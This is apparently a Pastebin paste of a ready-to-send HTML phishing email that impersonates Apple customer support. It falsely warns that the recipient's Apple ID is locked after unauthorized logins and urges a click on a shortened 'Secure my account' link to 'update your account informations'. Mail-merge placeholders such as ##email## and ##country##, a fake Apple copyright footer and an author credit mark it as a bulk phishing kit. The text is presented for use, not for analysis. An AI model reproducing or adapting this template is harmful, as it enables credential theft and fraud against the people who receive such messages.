Advertisement
d1m4s

Untitled

Jan 16th, 2018
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.28 KB | None | 0 0
  1. <FONT face=Calibri>&nbsp;
  2. <STYLE type=text/css>
  3. .txul li {
  4. padding-bottom:5px;
  5. }
  6.  
  7. table ul {
  8. list-style:none;
  9. margin:0;
  10. padding:0;
  11. }
  12.  
  13. a:focus {
  14. outline:thin dotted;
  15. }
  16.  
  17. a:hover,a:active {
  18. outline:0;
  19. }
  20.  
  21. a {
  22. color:#0069d6;
  23. text-decoration:none;
  24. line-height:inherit;
  25. font-weight:inherit;
  26. }
  27.  
  28. a:hover {
  29. color:#00438a;
  30. text-decoration:underline;
  31. }
  32.  
  33. table {
  34. width:100%;
  35. margin-bottom:18px;
  36. font-size:13px;
  37. border-collapse:collapse;
  38. padding:0;
  39. }
  40.  
  41. table th,table td {
  42. line-height:18px;
  43. text-align:left;
  44. padding:10px 10px 9px;
  45. }
  46.  
  47. table th {
  48. padding-top:9px;
  49. font-weight:700;
  50. vertical-align:middle;
  51. }
  52.  
  53. table td {
  54. vertical-align:top;
  55. border-top:1px solid #ddd;
  56. }
  57.  
  58. table tbody th {
  59. border-top:1px solid #ddd;
  60. vertical-align:top;
  61. }
  62.  
  63. .co
  64. ndensed-table th,.condensed-table td {
  65. padding:5px 5px 4px;
  66. }
  67.  
  68. .bordered-table {
  69. border:1px solid #ddd;
  70. border-collapse:collapse;
  71. -webkit-border-radius:4px;
  72. -moz-border-radius:4px;
  73. border-radius:4px;
  74. }
  75.  
  76. .bordered-ta
  77. ble th+th,.bordered-table td+td,.bordered-table th+td {
  78. border-left:1px solid #ddd;
  79. }
  80.  
  81. .bordered-table thead tr:first-child th:first-child,.bordered-table t
  82. body tr:first-child td:first-child {
  83. -webkit-border-radius:4px 0 0 0;
  84. -moz-border-radius:4px 0 0;
  85. border-radius:4px 0 0 0;
  86. }
  87.  
  88. .bordered-table thead tr:first
  89. -child th:last-child,.bordered-table tbody tr:first-child td:last-child {
  90. -webkit-border-radius:0 4px 0 0;
  91. -moz-border-radius:0 4px 0 0;
  92. border-radius:0 4px 0 0;
  93. }
  94.  
  95. .bordered-table tbody tr:last-child td:first-child {
  96. -webkit-border-radius:0 0 0 4px;
  97. -moz-border-radius:0 0 0 4px;
  98. border-radius:0 0 0 4px;
  99. }
  100.  
  101. .border
  102. ed-table tbody tr:last-child td:last-child {
  103. -webkit-border-radius:0 0 4px 0;
  104. -moz-border-radius:0 0 4px;
  105. border-radius:0 0 4px 0;
  106. }
  107.  
  108. .table table-striped t
  109. body tr:nth-child(odd) td,.table table-striped tbody tr:nth-child(odd) th {
  110. background-color:#f9f9f9;
  111. }
  112.  
  113. .table table-striped tbody tr:hover td,.table table
  114. -striped tbody tr:hover th {
  115. background-color:#f5f5f5;
  116. }
  117.  
  118. table .header {
  119. cursor:po inter;
  120. }
  121.  
  122. table .header:after {
  123. content:"";
  124. float:right;
  125. margin-top:7px;
  126. visibility:hid den;
  127. border-color:#000 transparent;
  128. border-style:solid;
  129. border-width:0 4px 4px;
  130. }
  131.  
  132. table .headerSortUp,table .headerSortDown {
  133. background-color:rgba(141,192,219,0.25);
  134. text-shadow:0 1px 1px rgba(255,255,255,0.75);
  135. }
  136.  
  137. table .header:hover
  138. :after {
  139. visibility:visible;
  140. }
  141.  
  142. table .headerSortDown:after,table .headerSortDown
  143. :hover:after {
  144. visibility:visible;
  145. filter:alpha(opacity60);
  146. -khtml-opacity:.6;
  147. -moz-opacity:.6;
  148. opacity:.6;
  149. }
  150.  
  151. table .headerSortUp:after {
  152. border-bottom:0;
  153. border-left:4px solid transparent;
  154. border-right:4px solid transparent;
  155. border-top:4px solid #000;
  156. visibility:visible;
  157. -webkit-box-shadow:none;
  158. -moz-box-shadow:none;
  159. box-shadow:none;
  160. filter:alpha(opacity60);
  161. -khtml-opacity:.6;
  162. -moz-opacity:.6;
  163. opacity:.6;
  164. }
  165.  
  166. .well {
  167. background-color:#f5f5f5;
  168. margin-bottom:20px;
  169. min-height:20px;
  170. border:1px solid rgba(0,0,0,0.05);
  171. -webkit-border-radius:4px;
  172. -moz-border-radius:4px;
  173. border-radius:4px;
  174. -webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.05);
  175. -moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.05);
  176. box-shadow:inset 0 1px 1px rgba(0,0,0,0.05);
  177. padding:19px;
  178. }
  179.  
  180. .well blockquote {
  181. border-color:rgba(0,0,0,0.15);
  182. }
  183. </STYLE>
  184. </FONT>
  185. <DIV class=content style="BORDER-TOP: #e5e5e5 1px solid; HEIGHT: 863px; BORDER-RIGHT: #e5e5e5 1px solid; WIDTH: 77.63%; MIN-WIDTH: 800px; BORDER-BOTTOM: #e5e5e5 1px solid; FLOAT: left; PADDING-BOTTOM: 2%; PADDING-TOP: 2%; PADDING-LEFT: 2%; BORDER-LEFT: #e5e5e5 1px solid; MARGIN: 4%; PADDING-RIGHT: 2%; BACKGROUND-COLOR: #fff">
  186. <P align=right><SPAN lang=EN-US><FONT color=#808080 face=Calibri><IMG border=0 alt="Customer &#13;&#10;&#13;&#10;Service" src="http://v.ly/fTuA" width=31 height=33></FONT></P></SPAN>
  187. <P><FONT face=Calibri>Dear Customer ##email## <BR></FONT></P>
  188. <P><FONT face=Calibri></FONT></P>
  189. <P><SPAN style='FONT-SIZE: small; FONT-FAMILY: "Microsoft Sans Serif"; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial'><FONT face=Calibri>For your protection, your Apple ID is automatically locked.</FONT></SPAN></P>
  190. <P><SPAN style='FONT-SIZE: small; FONT-FAMILY: "Microsoft Sans Serif"; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial'><SPAN style='FONT-SIZE: small; FONT-FAMILY: "Microsoft Sans Serif"; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial'><FONT face=Calibri>We detect unauthorized Login Attempts to your Apple ID from other IP Location. Please verify your identity today or your account will be&nbsp;locked due to concerns we have for the safety and integrity of the Apple Community</FONT></SPAN></SPAN></P>
  191. <P><FONT face=Calibri>Login Detail : </FONT></P>
  192. <P><FONT face=Calibri>Date/Time&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;##date##<BR>IP/Country&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;117.23.687.25(##country##)<BR>Browser&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; : ##browser##</FONT></P>
  193. <P><FONT size=4 face=Calibri><B><A href="http://v.ly/fTuA">Secure my account</A></B></FONT></P>
  194. <P><FONT face=Calibri>To continue enjoy our service, please update your account informations and we will validate your account. We will unlock your account when we finish your account validation.</FONT></P>
  195. <P><FONT face=Calibri>Thank you, <BR>Apple Customers Support Service. </FONT></P>
  196. <P><FONT face=Calibri></FONT>&nbsp;</P>
  197. <P align=center><FONT color=#ff0000 face=Calibri>"Please don't reply directly to this automatically generated email message"</FONT></P>
  198. <P align=center><FONT face=Calibri>This link will expire 12 hours after this email was send and your Apple ID may be suspend.<BR>AppleID - Community</FONT></P>
  199. <DIV style="WIDTH: 100% !important; BACKGROUND-COLOR: transparent">
  200. <DIV style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px">
  201. <DIV align=center>
  202. <DIV style="FONT-SIZE: 1px; BORDER-TOP: #bbbbbb 1px solid; HEIGHT: 1px; WIDTH: 100%; LINE-HEIGHT: 1px"><FONT face=Calibri></FONT></DIV></DIV></DIV></DIV>
  203. <P align=center><FONT face=Calibri><FONT color=#808080>Apple ID | Support | Terms and Conditions | Privacy Policy<BR>Copyright © 2018 Apple Inc. 1 Infinite Loop, Cupertino, CA 95014, United States. All rights reserved.</FONT><BR></FONT></P></DIV><!--letter by 999art-->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement